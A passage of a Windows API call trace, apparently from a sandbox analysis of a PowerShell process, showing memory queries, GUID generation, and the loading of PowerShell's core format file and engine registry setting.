	[0089.003] VirtualQuery (in: lpAddress=0x14d440, lpBuffer=0x14e440, dwLength=0x1c | out: lpBuffer=0x14e440*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0089.004] VirtualQuery (in: lpAddress=0x14d3d8, lpBuffer=0x14e3d8, dwLength=0x1c | out: lpBuffer=0x14e3d8*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0089.004] VirtualQuery (in: lpAddress=0x14d414, lpBuffer=0x14e414, dwLength=0x1c | out: lpBuffer=0x14e414*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0089.005] VirtualQuery (in: lpAddress=0x14d3d8, lpBuffer=0x14e3d8, dwLength=0x1c | out: lpBuffer=0x14e3d8*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0089.005] VirtualQuery (in: lpAddress=0x14d414, lpBuffer=0x14e414, dwLength=0x1c | out: lpBuffer=0x14e414*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0089.006] VirtualQuery (in: lpAddress=0x14d414, lpBuffer=0x14e414, dwLength=0x1c | out: lpBuffer=0x14e414*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0089.006] VirtualQuery (in: lpAddress=0x14d3d8, lpBuffer=0x14e3d8, dwLength=0x1c | out: lpBuffer=0x14e3d8*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0089.006] VirtualQuery (in: lpAddress=0x14d414, lpBuffer=0x14e414, dwLength=0x1c | out: lpBuffer=0x14e414*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0089.007] CoCreateGuid (in: pguid=0x14e788 | out: pguid=0x14e788*(Data1=0x4809a950, Data2=0x5050, Data3=0x48da, Data4=([0]=0x94, [1]=0x81, [2]=0xf8, [3]=0x24, [4]=0xfc, [5]=0xa2, [6]=0xbb, [7]=0x57))) returned 0x0
	[0089.007] VirtualQuery (in: lpAddress=0x14d3d8, lpBuffer=0x14e3d8, dwLength=0x1c | out: lpBuffer=0x14e3d8*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0089.007] VirtualQuery (in: lpAddress=0x14d414, lpBuffer=0x14e414, dwLength=0x1c | out: lpBuffer=0x14e414*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0089.008] VirtualQuery (in: lpAddress=0x14d3d8, lpBuffer=0x14e3d8, dwLength=0x1c | out: lpBuffer=0x14e3d8*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0089.008] VirtualQuery (in: lpAddress=0x14d414, lpBuffer=0x14e414, dwLength=0x1c | out: lpBuffer=0x14e414*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0089.009] VirtualQuery (in: lpAddress=0x14d414, lpBuffer=0x14e414, dwLength=0x1c | out: lpBuffer=0x14e414*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0089.009] VirtualQuery (in: lpAddress=0x14d3d8, lpBuffer=0x14e3d8, dwLength=0x1c | out: lpBuffer=0x14e3d8*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0089.009] VirtualQuery (in: lpAddress=0x14d414, lpBuffer=0x14e414, dwLength=0x1c | out: lpBuffer=0x14e414*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0089.009] VirtualQuery (in: lpAddress=0x14d3d8, lpBuffer=0x14e3d8, dwLength=0x1c | out: lpBuffer=0x14e3d8*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0089.009] VirtualQuery (in: lpAddress=0x14d414, lpBuffer=0x14e414, dwLength=0x1c | out: lpBuffer=0x14e414*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0089.010] VirtualQuery (in: lpAddress=0x14d3d8, lpBuffer=0x14e3d8, dwLength=0x1c | out: lpBuffer=0x14e3d8*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0089.010] VirtualQuery (in: lpAddress=0x14d414, lpBuffer=0x14e414, dwLength=0x1c | out: lpBuffer=0x14e414*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0089.011] VirtualQuery (in: lpAddress=0x14d27c, lpBuffer=0x14e27c, dwLength=0x1c | out: lpBuffer=0x14e27c*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0089.011] VirtualQuery (in: lpAddress=0x14d3d8, lpBuffer=0x14e3d8, dwLength=0x1c | out: lpBuffer=0x14e3d8*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0089.011] VirtualQuery (in: lpAddress=0x14d414, lpBuffer=0x14e414, dwLength=0x1c | out: lpBuffer=0x14e414*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0089.011] VirtualQuery (in: lpAddress=0x14d3d8, lpBuffer=0x14e3d8, dwLength=0x1c | out: lpBuffer=0x14e3d8*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0089.012] VirtualQuery (in: lpAddress=0x14d414, lpBuffer=0x14e414, dwLength=0x1c | out: lpBuffer=0x14e414*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0089.012] CoCreateGuid (in: pguid=0x14e788 | out: pguid=0x14e788*(Data1=0x1e661a3b, Data2=0x4e4c, Data3=0x4653, Data4=([0]=0xa0, [1]=0x5f, [2]=0x6f, [3]=0x9c, [4]=0x2e, [5]=0x4a, [6]=0x20, [7]=0xce))) returned 0x0
	[0089.012] CoCreateGuid (in: pguid=0x14e788 | out: pguid=0x14e788*(Data1=0xedf1c6b7, Data2=0x9f57, Data3=0x4754, Data4=([0]=0xb9, [1]=0x9d, [2]=0x6a, [3]=0x4, [4]=0x4a, [5]=0xc9, [6]=0x3e, [7]=0xb2))) returned 0x0
	[0089.012] CoCreateGuid (in: pguid=0x14e788 | out: pguid=0x14e788*(Data1=0xf3e0e76d, Data2=0x3f5d, Data3=0x4882, Data4=([0]=0xb1, [1]=0x37, [2]=0x2c, [3]=0xd3, [4]=0x70, [5]=0x62, [6]=0x2e, [7]=0x71))) returned 0x0
	[0089.013] CoCreateGuid (in: pguid=0x14e788 | out: pguid=0x14e788*(Data1=0x90c37d8, Data2=0x3124, Data3=0x4bab, Data4=([0]=0xbe, [1]=0xcd, [2]=0x39, [3]=0xbf, [4]=0xe, [5]=0x36, [6]=0xef, [7]=0x0))) returned 0x0
	[0089.014] CoCreateGuid (in: pguid=0x14e788 | out: pguid=0x14e788*(Data1=0x1a3917d2, Data2=0x3373, Data3=0x4272, Data4=([0]=0x98, [1]=0x40, [2]=0xc5, [3]=0xd5, [4]=0xc6, [5]=0x7e, [6]=0xc3, [7]=0x45))) returned 0x0
	[0089.014] VirtualQuery (in: lpAddress=0x14d30c, lpBuffer=0x14e30c, dwLength=0x1c | out: lpBuffer=0x14e30c*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0089.015] VirtualQuery (in: lpAddress=0x14d348, lpBuffer=0x14e348, dwLength=0x1c | out: lpBuffer=0x14e348*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0089.015] CoCreateGuid (in: pguid=0x14e788 | out: pguid=0x14e788*(Data1=0xa437391a, Data2=0x1bcc, Data3=0x462e, Data4=([0]=0xbb, [1]=0x8f, [2]=0x3e, [3]=0xbb, [4]=0xe1, [5]=0x1b, [6]=0x5f, [7]=0xc0))) returned 0x0
	[0089.015] CoCreateGuid (in: pguid=0x14e788 | out: pguid=0x14e788*(Data1=0xe9b63e7b, Data2=0x1fae, Data3=0x432e, Data4=([0]=0x9b, [1]=0x57, [2]=0x30, [3]=0x7d, [4]=0x6, [5]=0x2f, [6]=0xd3, [7]=0x53))) returned 0x0
	[0089.015] CoCreateGuid (in: pguid=0x14e788 | out: pguid=0x14e788*(Data1=0xa645f11f, Data2=0x734a, Data3=0x41f4, Data4=([0]=0x9a, [1]=0xd2, [2]=0x43, [3]=0x6f, [4]=0x8a, [5]=0x49, [6]=0xab, [7]=0x0))) returned 0x0
	[0089.016] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x29c
	[0089.016] GetLastError () returned 0x0
	[0089.016] GetFileType (hFile=0x29c) returned 0x1
	[0089.016] SetErrorMode (uMode=0x1) returned 0x1
	[0089.016] GetFileType (hFile=0x29c) returned 0x1
	[0089.016] ReadFile (in: hFile=0x29c, lpBuffer=0x1b9d770, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e794, lpOverlapped=0x0 | out: lpBuffer=0x1b9d770*, lpNumberOfBytesRead=0x14e794*=0x1000, lpOverlapped=0x0) returned 1
	[0089.018] GetLastError () returned 0x0
	[0089.018] ReadFile (in: hFile=0x29c, lpBuffer=0x1b9d770, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e794, lpOverlapped=0x0 | out: lpBuffer=0x1b9d770*, lpNumberOfBytesRead=0x14e794*=0x1000, lpOverlapped=0x0) returned 1
	[0089.018] GetLastError () returned 0x0
	[0089.018] ReadFile (in: hFile=0x29c, lpBuffer=0x1b9d770, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e794, lpOverlapped=0x0 | out: lpBuffer=0x1b9d770*, lpNumberOfBytesRead=0x14e794*=0x1000, lpOverlapped=0x0) returned 1
	[0089.019] GetLastError () returned 0x0
	[0089.019] ReadFile (in: hFile=0x29c, lpBuffer=0x1b9d770, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e794, lpOverlapped=0x0 | out: lpBuffer=0x1b9d770*, lpNumberOfBytesRead=0x14e794*=0x1000, lpOverlapped=0x0) returned 1
	[0089.019] GetLastError () returned 0x0
	[0089.019] ReadFile (in: hFile=0x29c, lpBuffer=0x1b9d770, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e794, lpOverlapped=0x0 | out: lpBuffer=0x1b9d770*, lpNumberOfBytesRead=0x14e794*=0x1000, lpOverlapped=0x0) returned 1
	[0089.019] GetLastError () returned 0x0
	[0089.020] ReadFile (in: hFile=0x29c, lpBuffer=0x1b9d770, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e794, lpOverlapped=0x0 | out: lpBuffer=0x1b9d770*, lpNumberOfBytesRead=0x14e794*=0x1000, lpOverlapped=0x0) returned 1
	[0089.020] GetLastError () returned 0x0
	[0089.021] ReadFile (in: hFile=0x29c, lpBuffer=0x1b9d770, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e794, lpOverlapped=0x0 | out: lpBuffer=0x1b9d770*, lpNumberOfBytesRead=0x14e794*=0x1000, lpOverlapped=0x0) returned 1
	[0089.021] GetLastError () returned 0x0
	[0089.021] ReadFile (in: hFile=0x29c, lpBuffer=0x1b9d770, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e794, lpOverlapped=0x0 | out: lpBuffer=0x1b9d770*, lpNumberOfBytesRead=0x14e794*=0x1000, lpOverlapped=0x0) returned 1
	[0089.021] GetLastError () returned 0x0
	[0089.021] ReadFile (in: hFile=0x29c, lpBuffer=0x1b9d770, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e794, lpOverlapped=0x0 | out: lpBuffer=0x1b9d770*, lpNumberOfBytesRead=0x14e794*=0x1000, lpOverlapped=0x0) returned 1
	[0089.021] GetLastError () returned 0x0
	[0089.022] ReadFile (in: hFile=0x29c, lpBuffer=0x1b9d770, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e794, lpOverlapped=0x0 | out: lpBuffer=0x1b9d770*, lpNumberOfBytesRead=0x14e794*=0x1000, lpOverlapped=0x0) returned 1
	[0089.022] GetLastError () returned 0x0
	[0089.023] ReadFile (in: hFile=0x29c, lpBuffer=0x1b9d770, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e794, lpOverlapped=0x0 | out: lpBuffer=0x1b9d770*, lpNumberOfBytesRead=0x14e794*=0x1000, lpOverlapped=0x0) returned 1
	[0089.023] GetLastError () returned 0x0
	[0089.023] ReadFile (in: hFile=0x29c, lpBuffer=0x1b9d770, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e794, lpOverlapped=0x0 | out: lpBuffer=0x1b9d770*, lpNumberOfBytesRead=0x14e794*=0x1000, lpOverlapped=0x0) returned 1
	[0089.023] GetLastError () returned 0x0
	[0089.023] ReadFile (in: hFile=0x29c, lpBuffer=0x1b9d770, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e794, lpOverlapped=0x0 | out: lpBuffer=0x1b9d770*, lpNumberOfBytesRead=0x14e794*=0x1000, lpOverlapped=0x0) returned 1
	[0089.023] GetLastError () returned 0x0
	[0089.024] ReadFile (in: hFile=0x29c, lpBuffer=0x1b9d770, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e794, lpOverlapped=0x0 | out: lpBuffer=0x1b9d770*, lpNumberOfBytesRead=0x14e794*=0x1000, lpOverlapped=0x0) returned 1
	[0089.024] GetLastError () returned 0x0
	[0089.024] ReadFile (in: hFile=0x29c, lpBuffer=0x1b9d770, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e794, lpOverlapped=0x0 | out: lpBuffer=0x1b9d770*, lpNumberOfBytesRead=0x14e794*=0x1000, lpOverlapped=0x0) returned 1
	[0089.024] GetLastError () returned 0x0
	[0089.024] ReadFile (in: hFile=0x29c, lpBuffer=0x1b9d770, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e794, lpOverlapped=0x0 | out: lpBuffer=0x1b9d770*, lpNumberOfBytesRead=0x14e794*=0x1000, lpOverlapped=0x0) returned 1
	[0089.024] GetLastError () returned 0x0
	[0089.024] ReadFile (in: hFile=0x29c, lpBuffer=0x1b9d770, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e794, lpOverlapped=0x0 | out: lpBuffer=0x1b9d770*, lpNumberOfBytesRead=0x14e794*=0x1000, lpOverlapped=0x0) returned 1
	[0089.024] GetLastError () returned 0x0
	[0089.027] ReadFile (in: hFile=0x29c, lpBuffer=0x1b9d770, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e794, lpOverlapped=0x0 | out: lpBuffer=0x1b9d770*, lpNumberOfBytesRead=0x14e794*=0x1000, lpOverlapped=0x0) returned 1
	[0089.027] GetLastError () returned 0x0
	[0089.027] ReadFile (in: hFile=0x29c, lpBuffer=0x1b9d770, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e794, lpOverlapped=0x0 | out: lpBuffer=0x1b9d770*, lpNumberOfBytesRead=0x14e794*=0x1000, lpOverlapped=0x0) returned 1
	[0089.027] GetLastError () returned 0x0
	[0089.027] ReadFile (in: hFile=0x29c, lpBuffer=0x1b9d770, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e794, lpOverlapped=0x0 | out: lpBuffer=0x1b9d770*, lpNumberOfBytesRead=0x14e794*=0x1000, lpOverlapped=0x0) returned 1
	[0089.028] GetLastError () returned 0x0
	[0089.028] ReadFile (in: hFile=0x29c, lpBuffer=0x1b9d770, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e794, lpOverlapped=0x0 | out: lpBuffer=0x1b9d770*, lpNumberOfBytesRead=0x14e794*=0x1000, lpOverlapped=0x0) returned 1
	[0089.028] GetLastError () returned 0x0
	[0089.028] ReadFile (in: hFile=0x29c, lpBuffer=0x1b9d770, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e794, lpOverlapped=0x0 | out: lpBuffer=0x1b9d770*, lpNumberOfBytesRead=0x14e794*=0xe67, lpOverlapped=0x0) returned 1
	[0089.028] GetLastError () returned 0x0
	[0089.028] ReadFile (in: hFile=0x29c, lpBuffer=0x1b9cd77, nNumberOfBytesToRead=0x199, lpNumberOfBytesRead=0x14e794, lpOverlapped=0x0 | out: lpBuffer=0x1b9cd77*, lpNumberOfBytesRead=0x14e794*=0x0, lpOverlapped=0x0) returned 1
	[0089.028] GetLastError () returned 0x0
	[0089.028] ReadFile (in: hFile=0x29c, lpBuffer=0x1b9d770, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e794, lpOverlapped=0x0 | out: lpBuffer=0x1b9d770*, lpNumberOfBytesRead=0x14e794*=0x0, lpOverlapped=0x0) returned 1
	[0089.029] GetLastError () returned 0x0
	[0089.029] CloseHandle (hObject=0x29c) returned 1
	[0089.029] GetLastError () returned 0x0
	[0089.029] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14e2f4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0089.029] GetLastError () returned 0x0
	[0089.029] SetErrorMode (uMode=0x1) returned 0x1
	[0089.029] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1bbe000 | out: lpFileInformation=0x1bbe000*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a182698, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a182698, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd368cf9c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x15e67)) returned 1
	[0089.029] GetLastError () returned 0x0
	[0089.029] SetErrorMode (uMode=0x1) returned 0x1
	[0089.029] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14e2c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0089.029] GetLastError () returned 0x0
	[0089.029] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e718 | out: phkResult=0x14e718*=0x29c) returned 0x0
	[0089.030] RegQueryValueExW (in: hKey=0x29c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14e760, lpData=0x0, lpcbData=0x14e75c*=0x0 | out: lpType=0x14e760*=0x1, lpData=0x0, lpcbData=0x14e75c*=0x56) returned 0x0
	[0089.030] RegQueryValueExW (in: hKey=0x29c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14e760, lpData=0x361778, lpcbData=0x14e75c*=0x56 | out: lpType=0x14e760*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x14e75c*=0x56) returned 0x0
	[0089.030] RegCloseKey (hKey=0x29c) returned 0x0
	[0089.030] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14e2c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0089.030] GetLastError () returned 0x0
	[0089.030] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14e254, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0089.030] GetLastError () returned 0x0
	[0089.035] CoCreateGuid (in: pguid=0x14e788 | out: pguid=0x14e788*(Data1=0xb5b2d17, Data2=0x2971, Data3=0x453a, Data4=([0]=0x9e, [1]=0xe1, [2]=0x1e, [3]=0xfe, [4]=0xee, [5]=0x4, [6]=0x67, [7]=0x86))) returned 0x0
	[0089.036] CoCreateGuid (in: pguid=0x14e788 | out: pguid=0x14e788*(Data1=0x67bf6a0e, Data2=0x1de5, Data3=0x4479, Data4=([0]=0x9e, [1]=0x1, [2]=0xd, [3]=0x56, [4]=0x85, [5]=0x5f, [6]=0xd1, [7]=0xad))) returned 0x0
	[0089.036] CoCreateGuid (in: pguid=0x14e788 | out: pguid=0x14e788*(Data1=0x76cb6f56, Data2=0x6352, Data3=0x427f, Data4=([0]=0x96, [1]=0xb1, [2]=0xc6, [3]=0xdb, [4]=0x7c, [5]=0x3b, [6]=0xd6, [7]=0xfb))) returned 0x0
	[0089.036] CoCreateGuid (in: pguid=0x14e788 | out: pguid=0x14e788*(Data1=0x60e205ec, Data2=0x95ea, Data3=0x43fc, Data4=([0]=0xbc, [1]=0xf8, [2]=0x3, [3]=0x68, [4]=0x8c, [5]=0x5, [6]=0xbf, [7]=0xfc))) returned 0x0
	[0089.036] CoCreateGuid (in: pguid=0x14e788 | out: pguid=0x14e788*(Data1=0x31cafcb, Data2=0xf960, Data3=0x44fb, Data4=([0]=0x9c, [1]=0x1e, [2]=0x8, [3]=0xa6, [4]=0x30, [5]=0xd3, [6]=0x27, [7]=0xae))) returned 0x0
	[0089.036] CoCreateGuid (in: pguid=0x14e788 | out: pguid=0x14e788*(Data1=0xd4d3f849, Data2=0x2e78, Data3=0x42e6, Data4=([0]=0xb0, [1]=0xbe, [2]=0x90, [3]=0x8f, [4]=0xa5, [5]=0x4a, [6]=0x96, [7]=0x3d))) returned 0x0
	[0089.036] CoCreateGuid (in: pguid=0x14e788 | out: pguid=0x14e788*(Data1=0xeb47cf78, Data2=0x1607, Data3=0x45b2, Data4=([0]=0x93, [1]=0x5e, [2]=0x2d, [3]=0x18, [4]=0x83, [5]=0x32, [6]=0x79, [7]=0x44))) returned 0x0
	[0089.037] VirtualQuery (in: lpAddress=0x14d4e0, lpBuffer=0x14e4e0, dwLength=0x1c | out: lpBuffer=0x14e4e0*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0089.037] CoCreateGuid (in: pguid=0x14e788 | out: pguid=0x14e788*(Data1=0x998bd809, Data2=0xcdfb, Data3=0x4447, Data4=([0]=0xbd, [1]=0xa6, [2]=0x65, [3]=0xf2, [4]=0x85, [5]=0xd5, [6]=0x9c, [7]=0xe1))) returned 0x0
	[0089.037] CoCreateGuid (in: pguid=0x14e788 | out: pguid=0x14e788*(Data1=0xccd8e0b8, Data2=0x35f5, Data3=0x4803, Data4=([0]=0x89, [1]=0xda, [2]=0x2, [3]=0x7b, [4]=0x8d, [5]=0x83, [6]=0x3a, [7]=0x23))) returned 0x0
	[0089.038] CoCreateGuid (in: pguid=0x14e788 | out: pguid=0x14e788*(Data1=0x6f60a3d3, Data2=0x6460, Data3=0x4ffd, Data4=([0]=0x95, [1]=0xb8, [2]=0x5, [3]=0xa2, [4]=0xf9, [5]=0x6d, [6]=0xe4, [7]=0x11))) returned 0x0
	[0089.038] CoCreateGuid (in: pguid=0x14e788 | out: pguid=0x14e788*(Data1=0x8a1111c6, Data2=0x91e5, Data3=0x44e7, Data4=([0]=0xaa, [1]=0xdc, [2]=0x99, [3]=0x76, [4]=0xab, [5]=0xd6, [6]=0x64, [7]=0x18))) returned 0x0
	[0089.038] CoCreateGuid (in: pguid=0x14e788 | out: pguid=0x14e788*(Data1=0x253838d0, Data2=0x2e93, Data3=0x4271, Data4=([0]=0x90, [1]=0x6b, [2]=0x6e, [3]=0x13, [4]=0x7c, [5]=0x8a, [6]=0xfc, [7]=0x2b))) returned 0x0
	[0089.038] CoCreateGuid (in: pguid=0x14e788 | out: pguid=0x14e788*(Data1=0xfeb31f66, Data2=0x63c1, Data3=0x4750, Data4=([0]=0xbe, [1]=0x96, [2]=0x82, [3]=0xcb, [4]=0xd6, [5]=0x3a, [6]=0xc1, [7]=0xf2))) returned 0x0
	[0089.039] CoCreateGuid (in: pguid=0x14e788 | out: pguid=0x14e788*(Data1=0x4d680773, Data2=0x1f79, Data3=0x4533, Data4=([0]=0xb2, [1]=0x87, [2]=0x79, [3]=0xc1, [4]=0xdd, [5]=0x93, [6]=0x29, [7]=0xaa))) returned 0x0
	[0089.039] CoCreateGuid (in: pguid=0x14e788 | out: pguid=0x14e788*(Data1=0xab7d5a97, Data2=0x505e, Data3=0x43c2, Data4=([0]=0x8e, [1]=0x95, [2]=0x33, [3]=0x30, [4]=0x89, [5]=0x10, [6]=0xdf, [7]=0x83))) returned 0x0
	[0089.039] CoCreateGuid (in: pguid=0x14e788 | out: pguid=0x14e788*(Data1=0x1ada05d9, Data2=0xfd88, Data3=0x4d40, Data4=([0]=0x98, [1]=0x62, [2]=0xe5, [3]=0x13, [4]=0x26, [5]=0xa8, [6]=0xf4, [7]=0xce))) returned 0x0
	[0089.039] CoCreateGuid (in: pguid=0x14e788 | out: pguid=0x14e788*(Data1=0xe589c12d, Data2=0xa2c7, Data3=0x4333, Data4=([0]=0x99, [1]=0x32, [2]=0x89, [3]=0x54, [4]=0xf8, [5]=0x1, [6]=0x93, [7]=0x75))) returned 0x0
	[0089.039] CoCreateGuid (in: pguid=0x14e788 | out: pguid=0x14e788*(Data1=0xa8329168, Data2=0xa5d3, Data3=0x496e, Data4=([0]=0xa0, [1]=0x17, [2]=0x26, [3]=0x7a, [4]=0x11, [5]=0xa5, [6]=0x5f, [7]=0x19))) returned 0x0
	[0089.040] CoCreateGuid (in: pguid=0x14e788 | out: pguid=0x14e788*(Data1=0xd5dd42a0, Data2=0x463c, Data3=0x4cb9, Data4=([0]=0xad, [1]=0x76, [2]=0x43, [3]=0xad, [4]=0xb8, [5]=0xc1, [6]=0x18, [7]=0x5b))) returned 0x0
	[0089.040] VirtualQuery (in: lpAddress=0x14d4c0, lpBuffer=0x14e4c0, dwLength=0x1c | out: lpBuffer=0x14e4c0*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0089.041] VirtualQuery (in: lpAddress=0x14d4c0, lpBuffer=0x14e4c0, dwLength=0x1c | out: lpBuffer=0x14e4c0*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0089.041] VirtualQuery (in: lpAddress=0x14d4c0, lpBuffer=0x14e4c0, dwLength=0x1c | out: lpBuffer=0x14e4c0*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
